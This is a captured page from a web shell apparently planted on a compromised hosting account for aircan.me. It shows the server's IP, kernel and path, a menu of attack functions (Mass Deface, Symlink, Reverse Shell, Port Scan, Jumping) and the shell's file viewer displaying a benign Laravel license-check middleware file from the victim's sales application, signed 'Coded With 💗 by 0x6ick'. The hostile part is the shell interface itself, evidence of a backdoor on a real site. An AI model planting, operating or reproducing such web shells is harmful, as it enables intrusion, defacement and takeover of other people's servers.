Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
ventas
/
app
/
Http
/
Middleware
/
Viewing: LicenseCheck.php
<?php /** * ============================================================================ * LC DESIGN - Sistema de Gestión Empresarial * ============================================================================ * * @copyright 2024-2025 LC Design. Todos los derechos reservados. * @license Propietario - Uso exclusivo bajo licencia * ============================================================================ */ namespace App\Http\Middleware; use Closure; use Illuminate\Http\Request; use App\Services\ActivationCodeGenerator; class LicenseCheck { protected $excludedRoutes = [ 'login', 'logout', 'register', 'lc/*', 'acerca-de', 'api/*', ]; public function handle(Request $request, Closure $next) { foreach ($this->excludedRoutes as $route) { if ($request->is($route)) { return $next($request); } } $licenseStatus = ActivationCodeGenerator::getLicenseStatus(); view()->share('licenseStatus', $licenseStatus); if ($licenseStatus['status'] === 'active') { return $next($request); } if ($licenseStatus['status'] === 'expired') { session()->flash('license_warning', '⚠️ Su licencia ha expirado. Contacte a LC Design para renovar.'); } if ($licenseStatus['status'] === 'demo') { session()->flash('license_warning', '⚠️ Software en modo DEMO. Algunas funciones están limitadas.'); } return $next($request); } }
Coded With 💗 by
0x6ick